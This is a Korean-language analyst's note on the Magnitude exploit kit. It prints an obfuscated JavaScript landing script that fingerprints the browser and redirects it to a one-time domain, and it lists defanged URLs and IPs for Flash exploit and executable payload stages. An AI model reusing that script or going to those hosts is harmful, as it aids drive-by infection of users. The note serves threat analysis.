Magnitude EK

 

작년부터 Magnitude EK 급증으로 인한 정리

 

 

 

hxxp://alteryog***.net/ (원인)

-> 감염 원인 사이트 찾기가 관건

 

+ 감염 원인 사이트에 의해 아래 코드가 동작된다

<html><head><script>var NWJ0b='',QIj7a9=window,th71fNSg=function(NWJ0b){var F7E4120=0;for(var Wu5Ibf=0;Wu5Ibf<NWJ0b[(81,679355538&&77,720094129).toString(32)];Wu5Ibf++)F7E4120=F7E4120+NWJ0b[(77,420115<<99,491667).toString(34)+"C"+(17,8531||62,23481).toString(31)+"At"](Wu5Ibf);return F7E4120^28;};jWeLO82=QIj7a9[(38,473273601+29,1289305795).toString(34)];for(var SKb2C in jWeLO82) if(!isNaN(jWeLO82[SKb2C])) NWJ0b+=th71fNSg(SKb2C)+"="+jWeLO82[SKb2C]+"&";QIj7a9[(18,202586275831&59,1395890144413).toString(35)]=(34,543883<<87,587705).toString(32)+"://96ba43i953h5oc."+(69,5542819465>88,12854312032).toString(30)+"."+(58,73010+38,773084).toString(30)+"/"+NWJ0b;</script></head><body></body></html> 

 

 

+ 위 사이트를 디코딩 하면 주소가 나오지만 1회성 도메인이다 (단, IP는 유효하다고 판단)

hxxp://96ba43i953h5oc.hitfirm.site/613=768&1139=0&953=96&1037=96&954=96&1146=738&1036=96&966=96&2054=true&967=

96&1032=32&572=1024&1041=1024&1492=0& (1회성 도메인, 217.172.190.49)

 

 

+ 악성 행위 동작 흐름 확인 (현재 동작되지 않음)

hxxp://64nd25fg2e30n7i.diskpop.bid (실제 악성코드 스크립트, 79.137.44.133)

hxxp://64nd25fg2e30n7i.diskpop.bid/8rb36z2671
hxxp://64nd25fg2e30n7i.diskpop.bid/ccjebk01ycp5 (CWS, zlib 압축)
hxxp://64nd25fg2e30n7i.diskpop.bid/ccjebk01ycp5 (ZWS, LZMA로 압축)  **
hxxp://79.137.44.133/2bd82ce8ded0210a2b4ec0d0b6767336
hxxp://64nd25fg2e30n7i.diskpop.bid/a434830a5322674eabea5de2c81a3536 (MZ)
hxxp://79.137.44.133/c10fc4e62342ba5d21a756734183c192 (MZ)
hxxp://64nd25fg2e30n7i.diskpop.bid/win%2013,0,0,182 (ZWS)
hxxp://64nd25fg2e30n7i.diskpop.bid/2c3058c42fc2398a75c4d5f5e2e7e8f5 (MZ)

-> 원인 사이트에 접근 후 LZMA 압축형태인 플래쉬 파일에 접근한 이력이 있다면 감염되었다고 판단됨

 

 

 

FE 사이트 참조
https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html

 

 

 

 

 

- Magnitede EK -